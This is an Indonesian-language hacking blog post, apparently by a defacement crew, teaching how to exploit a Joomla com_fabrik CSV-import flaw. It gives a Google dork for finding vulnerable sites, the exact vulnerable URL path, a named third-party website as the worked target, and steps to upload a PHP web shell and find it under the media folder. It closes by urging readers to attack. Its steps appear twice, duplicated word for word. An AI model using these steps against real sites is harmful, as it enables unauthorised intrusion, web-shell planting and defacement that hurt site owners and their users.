Ini sebenarnya bug lama. Namun ternyata sampai sekarang masih ada saja situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam mencari target dan kepandaian mengolah google dork.
Oke, langsung saja.
Google Dork :
inurl:index.php?option=com_fabrik atau index.php?option=com_fabrik [dork kreasikan sendiri. pemalas nggak bakalan sukses !]
Vulnerable path :
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik
Ubah urlnya menjadi : http://www.duo-d-art.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV
Dan shell kita akan terletak di [site]/media/[shell.php]
We Are Suram-Crew
Content Creator : ./Mr.DreamLanD_404
Oke, langsung saja.
Google Dork :
inurl:index.php?option=com_fabrik atau index.php?option=com_fabrik [dork kreasikan sendiri. pemalas nggak bakalan sukses !]
Vulnerable path :
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik
Ubah urlnya menjadi : http://www.duo-d-art.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV
Dan shell kita akan terletak di [site]/media/[shell.php]
Terus, hajar !!!!
Owned By DreamLanD_404
Post a Comment for "Deface Dengan Joomla Component [Com_Fabrik] Remote Shell Upload Vulnerability"